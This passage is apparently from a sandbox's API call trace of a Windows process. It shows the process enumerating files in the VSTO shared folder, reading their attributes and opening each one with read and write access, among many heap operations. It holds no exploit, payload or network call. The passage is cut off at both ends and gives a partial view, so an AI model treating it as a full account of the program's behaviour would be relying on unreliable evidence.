lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0xbee8)) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.803] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xa0, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x819d8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xa0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓뻨")) returned 0 [0087.803] FindClose (in: hFindFile=0x784d0 | out: hFindFile=0x784d0) returned 1 [0087.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0087.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0087.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0087.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0087.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.804] AreFileApisANSI () returned 1 [0087.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll", lpUsedDefaultChar=0x0) returned 63 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0087.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0087.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0087.805] AreFileApisANSI () returned 1 [0087.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0087.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e1c8 [0087.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 63 [0087.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.805] GetFileType (hFile=0x41c) returned 0x1 [0087.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0087.806] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.806] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.806] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.806] CloseHandle (hObject=0x41c) returned 1 [0087.806] AreFileApisANSI () returned 1 [0087.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0087.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e718 [0087.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 63 [0087.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.807] GetFileType (hFile=0x41c) returned 0x1 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0087.807] CloseHandle (hObject=0x41c) returned 1 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0087.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.808] AreFileApisANSI () returned 1 [0087.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e4f8 [0087.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 63 [0087.808] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080)) returned 1 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0087.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.808] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x4298, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="vstoee100.tlb", cAlternateFileName="VSTOEE~1.TLB")) returned 1 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0087.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0087.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.809] AreFileApisANSI () returned 1 [0087.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb", lpUsedDefaultChar=0x0) returned 66 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0087.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.810] AreFileApisANSI () returned 1 [0087.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0087.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82c28 [0087.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 66 [0087.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.811] GetFileType (hFile=0x41c) returned 0x1 [0087.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0087.811] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.811] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.811] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.811] CloseHandle (hObject=0x41c) returned 1 [0087.811] AreFileApisANSI () returned 1 [0087.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0087.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82298 [0087.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 66 [0087.812] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.812] GetFileType (hFile=0x41c) returned 0x1 [0087.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0087.812] CloseHandle (hObject=0x41c) returned 1 [0087.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0087.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 